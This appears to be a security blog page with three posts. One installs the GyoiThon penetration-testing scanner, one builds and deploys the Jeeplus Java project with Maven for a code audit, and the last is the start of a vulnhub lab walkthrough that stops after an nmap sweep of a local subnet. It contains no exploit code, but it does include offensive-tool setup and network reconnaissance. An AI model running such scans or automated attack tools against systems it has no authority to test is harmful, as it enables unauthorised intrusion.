DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting beautifulsoup4>=4.6.3
  Using cached https://files.pythonhosted.org/packages/c5/48/c88b0b390ae1f785942fc83413feb1268a1eb696f343d4d55db735b9bb39/beautifulsoup4-4.8.2-py2-none-any.whl
Requirement already satisfied: cchardet>=2.1.4 in c:\python27\lib\site-packages (from -r requirements.txt (line 2)) (2.1.5)
Collecting censys>=0.0.8
  Using cached https://files.pythonhosted.org/packages/88/4b/3ca07679928c26bb5503b53c37e2f6eef2521289956e2c1bf74b64008afa/censys-0.0.8.tar.gz
Requirement already satisfied: docopt>=0.6.2 in c:\python27\lib\site-packages (from -r requirements.txt (line 4)) (0.6.2)
Collecting google-api-python-client>=1.7.4
  Using cached https://files.pythonhosted.org/packages/31/c7/16ca16d28f2d71c8bd6fa67c91eb2a82259dc589c0504f903b675ecdaa84/google_api_python_client-1.7.11-py2-none-any.whl
Collecting Jinja2>=2.10.1
  Using cached https://files.pythonhosted.org/packages/65/e0/eb35e762802015cab1ccee04e8a277b03f1d8e53da3ec3106882ec42558b/Jinja2-2.10.3-py2.py3-none-any.whl
ERROR: Could not find a version that satisfies the requirement matplotlib>=3.0.3 (from -r requirements.txt (line 7)) (from versions: 0.86, 0.86.1, 0.86.2, 0.91.0, 0.91.1, 1.0.1, 1.1.0, 1.1.1, 1.2.0, 1.2.1, 1.3.0, 1.3.1, 1.4.0, 1.4.1rc1, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 2.0.0b1, 2.0.0b2, 2.0.0b3, 2.0.0b4, 2.0.0rc1, 2.0.0rc2, 2.0.0, 2.0.1, 2.0.2, 2.1.0rc1, 2.1.0, 2.1.1, 2.1.2, 2.2.0rc1, 2.2.0, 2.2.2, 2.2.3, 2.2.4)
ERROR: No matching distribution found for matplotlib>=3.0.3 (from -r requirements.txt (line 7))

The error ERROR: No matching distribution found for matplotlib>=3.0.3 (from -r requirements.txt (line 7)) says no matching version was found. I assumed it was a pip version problem, so I upgraded pip.

python -m pip install --upgrade pip

DEPRECATION: Python 2.7 will reach the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 won't be maintained after that date. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Requirement already up-to-date: pip in c:\python27\lib\site-packages (19.3.1)

1.1 Fixing the error

Still no effect; the system reported that pip was already the latest version. I figured it had to be the Python version, so I went straight to Python 3 and installed with pip3:

pip3 install -r requirements.txt -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com

## note the download speed
Looking in indexes: http://pypi.douban.com/simple/
Requirement already satisfied: beautifulsoup4>=4.6.3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (4.8.0)
Collecting cchardet>=2.1.4 (from -r requirements.txt (line 2))
  Downloading http://pypi.doubanio.com/packages/c6/20/905b6c5664736d884a40ac3b1204ab874c3c4a8ce86f7b2e28abc1fc6ee4/cchardet-2.1.5-cp37-cp37m-manylinux1_x86_64.whl (241kB)
    100% |████████████████████████████████| 245kB 6.9MB/s 
Collecting censys>=0.0.8 (from -r requirements.txt (line 3))

-i $url --trusted-host $host points pip at a different index URL; --trusted-host is what lets pip accept an index served over plain HTTP without a certificate check, as here.
It later turned out that the matplotlib>=3.0.3 entry in requirements.txt needs Python 3.6 or later, which is why the install failed.

cat /media/root/binAxin/GyoiThon/requirements.txt 
beautifulsoup4>=4.6.3
cchardet>=2.1.4
censys>=0.0.8
docopt>=0.6.2
google-api-python-client>=1.7.4
Jinja2>=2.10.1
matplotlib>=3.0.3
msgpack-python>=0.5.6
networkx>=2.2
pandas>=0.22.0
pysocks>=1.6.7
Scrapy>=1.5.0
tldextract>=2.2.1
urllib3>=1.25

2 Running the scan

2.1 Configuring host.txt

After you run gyoithon, it updates the CVE data under the modules folder; just wait for that to finish. A quick look at the introduction:

GyoiThon is a machine-learning-based penetration testing tool.


GyoiThon identifies the software installed on the web server (OS, middleware, framework, CMS, etc.) from its learned data. It then runs the applicable attacks for the identified software. Finally, GyoiThon automatically generates a scan report.


All of the above is performed automatically by GyoiThon; the only thing the user does is enter the URL of the target web server's home page. It is very simple and takes almost no time or effort to identify vulnerabilities on the web server. For this, GyoiThon needs a set of signatures to match against; once they are downloaded, the scanner is ready to use. Note that host.txt must be configured before running.

# ls
config.ini   handout   LICENSE  __pycache__  requirements.txt  util.py
docker       host.txt  logs     README.md    signatures        util.pyc
gyoithon.py  img       modules  report       temp_signatures

# cat host.txt 
http localhost 80 /

As shown, the format is:
protocol<space>URL<space>port<space>path

PS G:\GyoiThon> python3 .\gyoithon.py

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 ██████╗██╗   ██╗ ██████╗ ██╗████████╗██╗  ██╗ ██████╗ ███╗   ██╗
██╔════╝╚██╗ ██╔╝██╔═══██╗██║╚══██╔══╝██║  ██║██╔═══██╗████╗  ██║
██║  ███╗╚████╔╝ ██║   ██║██║   ██║   ███████║██║   ██║██╔██╗ ██║
██║   ██║ ╚██╔╝  ██║   ██║██║   ██║   ██╔══██║██║   ██║██║╚██╗██║
╚██████╔╝  ██║   ╚██████╔╝██║   ██║   ██║  ██║╚██████╔╝██║ ╚████║
 ╚═════╝   ╚═╝    ╚═════╝ ╚═╝   ╚═╝   ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝  (beta)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
by gyoithon.py

       =[ GyoiThon v0.0.3-beta                               ]=
+ -- --=[ Author  : Gyoiler (@gyoithon)                      ]=--
+ -- --=[ Website : https://github.com/gyoisamurai/GyoiThon/ ]=--

When the scan completes, the scanner produces a CSV report; just open it.

That's all.

[Read More]

「Code Audit」: Building the Jeeplus project with Maven

Jan 19, 2020. | By: Bin4xin

1. Maven build

First, obtain a Maven-built project; only Java projects built with Maven can be built and deployed this way.
The project below is the one I used for practice; you can find it on GitHub yourself.

Maven environment setup is skipped here. One more note: this includes configuring Maven's local environment variables and the local repository; ask Baidu yourself.

#PS go into your own Maven project folder; mine is G:\yj-work\java-code\jeeplus-open
PS C:\Users\本阿信> cd G:\yj-work\java-code\jeeplus-open
PS G:\yj-work\java-code\jeeplus-open> ls


    目录: G:\yj-work\java-code\jeeplus-open


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2020/1/10     16:26                .idea
d-----         2020/1/9     11:03                .settings
d-----         2020/1/9     11:03                src
d-----         2020/1/9     11:03                target
-a----         2020/1/9     11:03           1350 .classpath
-a----         2020/1/9     11:03           1444 .project
-a----         2016/9/4      9:11          10252 LICENSE
-a----         2016/9/4      9:11          23054 pom.xml
-a----         2016/9/4      9:11            371 README.md

1.1 Building the effective-pom

As above, the key item is the pom: you can see the pom.xml that Maven builds from. Enter the command mvn help:effective-pom
and Maven will process it and display the effective POM, as follows:

PS G:\yj-work\java-code\jeeplus-open> mvn help:effective-pom
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-help-plugin:3.2.0:effective-pom (default-cli) @ jeeplus ---
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven-model/3.6.1/maven-model-3.6.1.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven-model/3.6.1/maven-model-3.6.1.pom (4.0 kB at 4.1 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven/3.6.1/maven-3.6.1.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven/3.6.1/maven-3.6.1.pom (24 kB at 95 kB/s)

###################################################
################ download details omitted :> ######
###################################################

I have deliberately separated out the part below so it is easier to see: when we build the project we can see its related elements. Back when we were beginners, this kind of console output was genuinely exciting! @-@

As below, Maven echoes the effective POM for jeeplus:

[INFO]
Effective POMs, after inheritance, interpolation, and profiles are applied:

<?xml version="1.0" encoding="GBK"?>
<!-- ====================================================================== -->
<!--                                                                        -->
<!-- Generated by Maven Help Plugin on 2020-01-19T15:52:57+08:00            -->
<!-- See: http://maven.apache.org/plugins/maven-help-plugin/                -->
<!--                                                                        -->
<!-- ====================================================================== -->
<!-- ====================================================================== -->
<!--                                                                        -->
<!-- Effective POM for project 'jeeplus:jeeplus:war:1.0.0-SNAPSHOT'         -->
<!--                                                                        -->
<!-- ====================================================================== -->

###################################################
###### groupId, artifactId and other settings omitted :> ######
###################################################

[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  12.235 s
[INFO] Finished at: 2020-01-19T15:53:00+08:00
[INFO] ------------------------------------------------------------------------

In the pom.xml above you can see the default source directory structure, output directory, plugins, repositories and report directories that Maven uses when executing goals. The Maven pom.xml also does not need to be written by hand: Maven provides a large number of archetype plugins that create a project, including its directory structure and pom.xml.
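The [WARNING] lines in the output above say the same javax.servlet.jsp:jsp-api coordinate is declared twice with different versions; which jar actually ends up in the war then depends on Maven's resolution order, so the build is not reproducible. The checker below is an added example, not code from the post or the Jeeplus project: it reproduces Maven's uniqueness rule (groupId:artifactId:type:classifier) on a constructed minimal pom.xml, not the real Jeeplus POM.

```python
"""Reproduce Maven's dependency-uniqueness warning (added example, not from the project)."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed minimal pom.xml reproducing the situation reported above: the same
# coordinate declared twice with different versions. Not the real Jeeplus POM.
SAMPLE_POM = """<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>jeeplus</groupId>
  <artifactId>jeeplus</artifactId>
  <version>1.0.0-SNAPSHOT</version>
  <packaging>war</packaging>
  <dependencies>
    <dependency>
      <groupId>javax.servlet.jsp</groupId>
      <artifactId>jsp-api</artifactId>
      <version>2.1</version>
      <scope>provided</scope>
    </dependency>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>4.12</version>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>javax.servlet.jsp</groupId>
      <artifactId>jsp-api</artifactId>
      <version>2.2</version>
    </dependency>
  </dependencies>
</project>
"""

Coordinate = Tuple[str, str, str, str]  # groupId, artifactId, type, classifier


def _child_text(dep: ET.Element, tag: str, default: str = "") -> str:
    node = dep.find(f"{{*}}{tag}")      # {*} matches any namespace (Python 3.8+)
    return node.text.strip() if node is not None and node.text else default


def find_duplicate_dependencies(pom_xml: str) -> Dict[Coordinate, List[str]]:
    """Group the project's direct <dependency> entries by Maven's uniqueness key
    and return the keys declared more than once, mapped to the versions seen
    in declaration order."""
    root = ET.fromstring(pom_xml)
    versions: Dict[Coordinate, List[str]] = defaultdict(list)
    for dep in root.findall("{*}dependencies/{*}dependency"):
        key: Coordinate = (
            _child_text(dep, "groupId"),
            _child_text(dep, "artifactId"),
            _child_text(dep, "type", "jar"),       # Maven's default type
            _child_text(dep, "classifier"),
        )
        versions[key].append(_child_text(dep, "version", "(managed)"))
    return {key: seen for key, seen in versions.items() if len(seen) > 1}


def format_warnings(duplicates: Dict[Coordinate, List[str]]) -> List[str]:
    """Render each conflict in the same shape as Maven's console warning."""
    return [
        "'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: "
        f"{g}:{a}:{t} -> version {' vs '.join(seen)}"
        for (g, a, t, _classifier), seen in duplicates.items()
    ]


if __name__ == "__main__":
    for line in format_warnings(find_duplicate_dependencies(SAMPLE_POM)):
        print("[WARNING]", line)
```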

2 Configuring the properties file

Inside the jeeplus project, configure the properties file for your own environment, for example the database settings in \src\main\resources\jeeplus.properties. Since I run MySQL locally, here is just the MySQL section:

#mysql database setting
jdbc.type=mysql
jdbc.driver=com.mysql.jdbc.Driver
jdbc.url=jdbc:mysql://localhost:3306/jeeplus_schema?useUnicode=true&characterEncoding=utf-8
jdbc.username=root
jdbc.password=root

Set the MySQL username and password to those of your local database (mine are both root); fill them in correctly or it will fail. Then start mysqld and move on to the Maven build.

3 Maven test

3.1 test

Run mvn test to check whether the Maven build of the Java project reports any errors:

PS G:\yj-work\java-code\jeeplus-open> mvn test
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] Copying 65 resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:compile (default-compile) @ jeeplus ---
[INFO] Changes detected - recompiling the module!
[INFO] Compiling 258 source files to G:\yj-work\java-code\jeeplus-open\target\classes
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 某些输入文件使用或覆盖了已过时的 API。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 有关详细信息, 请使用 -Xlint:deprecation 重新编译。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 某些输入文件使用了未经检查或不安全的操作。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 有关详细信息, 请使用 -Xlint:unchecked 重新编译。
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] skip non existing resourceDirectory G:\yj-work\java-code\jeeplus-open\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:testCompile (default-testCompile) @ jeeplus ---
[INFO] No sources to compile
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ jeeplus ---
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  10.063 s
[INFO] Finished at: 2020-01-19T16:46:53+08:00
[INFO] ------------------------------------------------------------------------

3.2 clean package

Next, run the mvn clean package command:

PS G:\yj-work\java-code\jeeplus-open> mvn clean package
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-clean-plugin:2.5:clean (default-clean) @ jeeplus ---
[INFO] Deleting G:\yj-work\java-code\jeeplus-open\target
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] Copying 65 resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:compile (default-compile) @ jeeplus ---
[INFO] Changes detected - recompiling the module!
[INFO] Compiling 258 source files to G:\yj-work\java-code\jeeplus-open\target\classes
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 某些输入文件使用或覆盖了已过时的 API。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 有关详细信息, 请使用 -Xlint:deprecation 重新编译。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 某些输入文件使用了未经检查或不安全的操作。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 有关详细信息, 请使用 -Xlint:unchecked 重新编译。
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] skip non existing resourceDirectory G:\yj-work\java-code\jeeplus-open\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:testCompile (default-testCompile) @ jeeplus ---
[INFO] No sources to compile
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ jeeplus ---
[INFO] No tests to run.
[INFO]
[INFO] --- maven-war-plugin:2.2:war (default-war) @ jeeplus ---
[INFO] Packaging webapp
[INFO] Assembling webapp [jeeplus] in [G:\yj-work\java-code\jeeplus-open\target\jeeplus]
[INFO] Processing war project
[INFO] Copying webapp resources [G:\yj-work\java-code\jeeplus-open\src\main\webapp]
[INFO] Webapp assembled in [19918 msecs]
[INFO] Building war: G:\yj-work\java-code\jeeplus-open\target\jeeplus.war
[INFO] WEB-INF\web.xml already added, skipping
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  38.071 s
[INFO] Finished at: 2020-01-19T16:49:31+08:00
[INFO] ------------------------------------------------------------------------

Two BUILD SUCCESSes in a row, exciting. Maven has built the war that Tomcat needs for deployment: [INFO] Building war: G:\yj-work\java-code\jeeplus-open\target\jeeplus.war. Go to that absolute path and copy the war into Tomcat's webapps folder.

Deployment is done; check the project to see whether it was deployed successfully.

Verifying the deployment

Enough talk, here's the code:
go to tomcat/bin/ and start Tomcat

PS E:\java\tomcat\apache-tomcat-8.5.50\bin> .\startup.bat
Using CATALINA_BASE:   "E:\java\tomcat\apache-tomcat-8.5.50"
Using CATALINA_HOME:   "E:\java\tomcat\apache-tomcat-8.5.50"
Using CATALINA_TMPDIR: "E:\java\tomcat\apache-tomcat-8.5.50\temp"
Using JRE_HOME:        "C:\Program Files\Java\jdk1.8.0_231\jre"
Using CLASSPATH:       "E:\java\tomcat\apache-tomcat-8.5.50\bin\bootstrap.jar;E:\java\tomcat\apache-tomcat-8.5.50\bin\tomcat-juli.jar"

Verify the deployment: curl localhost/jeeplus

PS E:\java\tomcat\apache-tomcat-8.5.50\bin> curl localhost/jeeplus

StatusCode        : 200
StatusDescription :
Content           :

                    <!DOCTYPE html>
                    <html>

                        <head>
                                <meta name="description" content="User login page" />
                                <meta name="viewport" content="width=device-width, initial-scale=1.0" />
                                <script src="/jeeplus...
RawContent        : HTTP/1.1 200
                    Content-Language: zh-CN
                    Content-Length: 19162
                    Content-Type: text/html;charset=UTF-8
                    Date: Sun, 19 Jan 2020 09:23:26 GMT

ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 19162

As shown, deployment succeeded: status 200 is returned.

That's all.


Other

The above shows Maven creating a standardized Java project; deploying a Maven project, for example, can be done the way shown above. More often, for me, the high-frequency use of Maven is in the vulnerability verification and exploitation phase, that is, with publicly released Java PoC code and the like. Clearly I prefer Java PoC code to Python. Because of the convenience of the Python language itself, many of the Python PoCs online have, in my view, no real value for understanding the principle of the vulnerability. I'm not saying Python PoCs are bad; the language is simply so convenient that reproducing a vulnerability becomes very easy, which leads people, especially newcomers, to think little or not at all.

Enough talk; back to this section:

E:\java\hadoop> mvn archetype:generate -D archetypeGroupId=org.apache.maven.archetypes -D groupId=org.conan.myhadoop.mr -D artifactId=myHadoop -D packageName=org.conan.myhadoop.mr -D version=1.0-SNAPSHOT -D interactiveMode=false
The output is as follows:
[INFO] Scanning for projects...
[INFO]
[INFO] ------------------< org.apache.maven:standalone-pom >-------------------
[INFO] Building Maven Stub Project (No POM) 1
[INFO] --------------------------------[ pom ]---------------------------------
[INFO]
[INFO] >>> maven-archetype-plugin:3.1.2:generate (default-cli) > generate-sources @ standalone-pom >>>
[INFO]
[INFO] <<< maven-archetype-plugin:3.1.2:generate (default-cli) < generate-sources @ standalone-pom <<<
[INFO]
[INFO]
[INFO] --- maven-archetype-plugin:3.1.2:generate (default-cli) @ standalone-pom ---
[INFO] Generating project in Batch mode
[WARNING] No archetype found in remote catalog. Defaulting to internal catalog
[INFO] No archetype defined. Using maven-archetype-quickstart (org.apache.maven.archetypes:maven-archetype-quickstart:1.0)
[INFO] ----------------------------------------------------------------------------
[INFO] Using following parameters for creating project from Old (1.x) Archetype: maven-archetype-quickstart:1.0
[INFO] ----------------------------------------------------------------------------
[INFO] Parameter: basedir, Value: E:\java\hadoop
[INFO] Parameter: package, Value: org.conan.myhadoop.mr
[INFO] Parameter: groupId, Value: org.conan.myhadoop.mr
[INFO] Parameter: artifactId, Value: myHadoop
[INFO] Parameter: packageName, Value: org.conan.myhadoop.mr
[INFO] Parameter: version, Value: 1.0-SNAPSHOT
[INFO] project created from Old (1.x) Archetype in dir: E:\java\hadoop\myHadoop
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  3.491 s
[INFO] Finished at: 2020-02-13T14:35:21+08:00
[INFO] ------------------------------------------------------------------------
PS E:\java\hadoop> cd .\myHadoop\
PS E:\java\hadoop\myHadoop> mvn clean install
[INFO] Scanning for projects...
[INFO]
[INFO] -------------------< org.conan.myhadoop.mr:myHadoop >-------------------
[INFO] Building myHadoop 1.0-SNAPSHOT
[INFO] --------------------------------[ jar ]---------------------------------
[INFO]
[INFO] --- maven-clean-plugin:2.5:clean (default-clean) @ myHadoop ---
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ myHadoop ---
[WARNING] Using platform encoding (GBK actually) to copy filtered resources, i.e. build is platform dependent!
[INFO] skip non existing resourceDirectory E:\java\hadoop\myHadoop\src\main\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ myHadoop ---
[INFO] Changes detected - recompiling the module!
[WARNING] File encoding has not been set, using platform encoding GBK, i.e. build is platform dependent!
[INFO] Compiling 1 source file to E:\java\hadoop\myHadoop\target\classes
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ myHadoop ---
[WARNING] Using platform encoding (GBK actually) to copy filtered resources, i.e. build is platform dependent!
[INFO] skip non existing resourceDirectory E:\java\hadoop\myHadoop\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.1:testCompile (default-testCompile) @ myHadoop ---
[INFO] Changes detected - recompiling the module!
[WARNING] File encoding has not been set, using platform encoding GBK, i.e. build is platform dependent!
[INFO] Compiling 1 source file to E:\java\hadoop\myHadoop\target\test-classes
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ myHadoop ---
[INFO] Surefire report directory: E:\java\hadoop\myHadoop\target\surefire-reports
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.pom (1.7 kB at 2.0 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-providers/2.12.4/surefire-providers-2.12.4.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-providers/2.12.4/surefire-providers-2.12.4.pom (2.3 kB at 7.4 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.jar
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.jar (26 kB at 60 kB/s)

-------------------------------------------------------
 T E S T S
-------------------------------------------------------
Running org.conan.myhadoop.mr.AppTest
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.02 sec

Results :

Tests run: 1, Failures: 0, Errors: 0, Skipped: 0

[INFO]
[INFO] --- maven-jar-plugin:2.4:jar (default-jar) @ myHadoop ---
[INFO] Building jar: E:\java\hadoop\myHadoop\target\myHadoop-1.0-SNAPSHOT.jar
[INFO]
[INFO] --- maven-install-plugin:2.4:install (default-install) @ myHadoop ---
[INFO] Installing E:\java\hadoop\myHadoop\target\myHadoop-1.0-SNAPSHOT.jar to D:\Workspace\.m2\repository\org\conan\myhadoop\mr\myHadoop\1.0-SNAPSHOT\myHadoop-1.0-SNAPSHOT.jar
[INFO] Installing E:\java\hadoop\myHadoop\pom.xml to D:\Workspace\.m2\repository\org\conan\myhadoop\mr\myHadoop\1.0-SNAPSHOT\myHadoop-1.0-SNAPSHOT.pom
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  6.062 s
[INFO] Finished at: 2020-02-13T14:36:02+08:00
[INFO] ------------------------------------------------------------------------

[Read More]

  • Maven builds and Gradle builds have been giving me a headache lately; copying other people's work day after day and still not getting it right. The problem isn't fully solved yet, so I'm just jotting this down.

  • Continuously updating; updated 2020/01/21

My mentor recently had me read a FreeBuf article on auditing the jeeplus code. The article is good, and I found a project to try it on myself. Having no Java development background, I was completely in the dark and wasted a lot of time, so here are some quick notes.

Redis-x64-3.2.100.msi

Symptoms

404

After importing the jeeplus project into Eclipse, building it with Maven and deploying to Tomcat without any error, the project still could not be reached: always 404. Searching turned up this CSDN answer:

Solution: select the project, right-click and choose "properties" > Deployment,
then remove the webContent entry (the test-related entries can be removed as well;
test is the test-related folder). Add a folder: next -> next -> the webapp folder under src/main,
then click "Finish". Then add a Java Build Path Entries -> Maven Dependencies,
click "Finish", and finally click "OK".
Restart Tomcat and enter the corresponding address in the browser: http://localhost:8080/MavenTest/index.jsp to test whether the web project was created successfully.

jar not found

Tomcat cannot find the jars

If it is a Maven project and Tomcat does not publish the jars added as Maven dependencies when it deploys the project,
you need to configure Eclipse:
Project -> Properties -> Deployment Assembly -> Add -> Java Build Path Entries -> select Maven Dependencies -> Finish -> OK
This publishes the Maven dependency jars to Tomcat as well; while debugging, those jars are published automatically to the target directory, and Tomcat can find them.

Working with Eclipse

mvn eclipse:clean
mvn eclipse:eclipse
## for an ordinary Eclipse project run:
mvn eclipse:eclipse
## for an Eclipse web project run:
mvn eclipse:eclipse -Dwtpversion=1.0
--------------------------------------------------fancy divider--------------------------------------------------

「Update」

「2020-01-21 11:22:26」: Maven build

My Java used to be terrible, let alone anything as fancy as a 「Maven」 build; after nearly a week of study I finally built my first Java web project with Maven. Unable to contain my excitement, I'm writing it down.

Maven-Build-Jeeplus notes

[Read More]

「Pentest」: vulnhub-me-and-myGirlfriend

Jan 8, 2020. | By: Bin4xin

  • A vulnhub walkthrough~

Sniffing out the target

nmap leads the way

Find out the target machine's IP:

root@bin4xin:/usr/share/wordlist# nmap -sP 192.168.3.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2020-01-08 10:06 UTC
Nmap scan report for _gateway (192.168.3.1)
Host is up (0.0018s latency).
MAC Address: 24:DA:33:2A:53:84 (Unknown)
Nmap scan report for 192.168.3.3
Host is up (0.0023s latency).
MAC Address: 6C:4B:90:33:8A:CC (LiteON)
Nmap scan report for 192.168.3.11
Host is up (0.010s latency).
MAC Address: 1A:DF:41:4B:9D:05 (Unknown)
Nmap scan report for 192.168.3.14
Host is up (0.049s latency).
MAC Address: F4:63:1F:BF:96:DB (Unknown)
Nmap scan report for 192.168.3.17
Host is up (0.010s latency).
MAC Address: 2C:6F:C9:12:7B:42 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.3.30
Host is up (0.010s latency).
MAC Address: 88:B1:11:7D:83:45 (Intel Corporate)
Nmap scan report for 192.168.3.32
Host is up (-0.10s latency).
MAC Address: 68:07:15:D5:46:16 (Intel Corporate)
Nmap scan report for 192.168.3.33
Host is up (-0.094s latency).
MAC Address: 94:87:E0:1B:F2:D5 (Unknown)
Nmap scan report for 192.168.3.34
Host is up (0.010s latency).
MAC Address: F4:60:E2:8B:C8:BC (Unknown)
Nmap scan report for 192.168.3.40
Host is up (0.046s latency).
MAC Address: 24:DF:6A:25:C6:8E (Huawei Technologies)
Nmap scan report for 192.168.3.59
Host is up (0.00033s latency).
MAC Address: 08:00:27:FD:9B:9B (Oracle VirtualBox virtual NIC)
